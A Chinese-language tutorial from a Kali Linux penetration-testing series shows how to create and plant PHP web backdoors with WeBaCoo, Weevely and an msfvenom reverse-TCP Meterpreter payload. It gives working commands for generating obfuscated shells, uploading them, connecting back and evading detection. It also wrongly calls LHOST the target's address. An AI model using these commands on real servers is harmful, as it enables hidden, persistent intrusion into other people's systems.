Kali linux渗透测试系列————34、Kali linux 维持访问之创建Web后门

WeBaCoo

WeBaCoo(Web Backdoor Cookie)是一款隐蔽的脚本类Web后门工具。借助HTTP协议,它可以在客户端和服务器端实现执行代码的网页终端。

WeBaCoo有两种工作模式:

  • Generation(生产线模式):指定-g选项可进入这种模式。用户可以在这种模式下制作PHP代码的payload
  • Terminal(终端模式):指定-t选项可进入这种模式,用户可以在这种模式下连接到被测主机的后门程序。

WeBaCoo的精妙之处在于,Web服务器和客户端之间的通信载体是Cookie。这就意味着多数的杀毒软件、网络入侵检测/防御系统、网络防火墙和应用程序防火墙都无法检测到后门的所在。

WeBaCoo的HTTP Cookie中以下三个参数最为重要:

  • cm:以base64编码的shell指令
  • cn:加载着编码后输出内容的Cookie名称
  • cp:封装编码后输出内容的分隔符

如需启动WeBaCoo程序,可以在终端输入下述命令:
Kali linux渗透测试系列————34、Kali linux 维持访问之创建Web后门_第1张图片

与生成模式有关的命令行选项如下:

选项 描述
-g 制作后门代码
-f

后门所需要的PHP功能

system(default)

shell_exec

exec

passthru

popen

-o 指定生成的后门程序的文件名

如果要使用默认的设置,生成名为test.php的PHP后门程序,并使用WeBaCoo的代码混淆技术对后门进行处理,那么可以使用下述命令

webacoo  -g    -o    test.php

Kali linux渗透测试系列————34、Kali linux 维持访问之创建Web后门_第2张图片

文件test.php内容如下:

Kali linux渗透测试系列————34、Kali linux 维持访问之创建Web后门_第3张图片

而后,包这个文件上传到被测主机上去

接下来就可以使用下面的命令连接到被测主机的后门程序了:

webacoo -t -u http://ip/test.php

WeBaCoo后门的客户端和服务器端的通信是不易发现的、

Weevely

Weevely是一款具有高隐蔽性的针对PHP平台的WEBShell。它实现了SSH风格的终端界面,并有大量自动化的模块。测试人员可用它来执行系统命令、远程管理和渗透后期的自动渗透界面。

Weevely的主要用途是:

  • 生成混淆的PHP backdoor
  • 在图像文件中追加多态后门程序,并可以通过。htaccess文件赋予图像文件执行权限。
  • 生成后门。htaccess文件。
  • 可通过help选项列出程序的全部模块和生成工具

Kali linux渗透测试系列————34、Kali linux 维持访问之创建Web后门_第4张图片

使用夏磊指令可以生成混淆PHP backdoor,并将后门保存为display.php

weevely generate password display.php

之后还是以一样,上传到目标机器上

之后链接WEBshell即可

PHP Meterpreter

Metasploit有一个名为PHP Meterpreter的payload。这个模块可以创建具有Meterpreter功能的PHP webShell。利用目标的漏洞(诸如常见的注入、文件上传漏洞)之后,再把它的shell传到目标主机即可。

Metasploit 的msfvenom工具可以制作PHP Meterpreter,具体指令如下:

msfvenom -p  php/meterpreter/reverse_tcp LHOST=192.168.x.x   -f   raw >php-meter.php

上述指令各选项的作用如下:

-p :指定payload为php/meterpreter/reverse_tcp

-f:设置输出格式(raw)

LHOST :设定目标主机的IP地址

Metasploit会把生成的PHP Meterpreter保存为文件php-mter.php。

你可能感兴趣的:(【信息安全】,【Kali,Linux渗透测试高级篇】,———Kali,linux,渗透测试高级篇,高级渗透测试)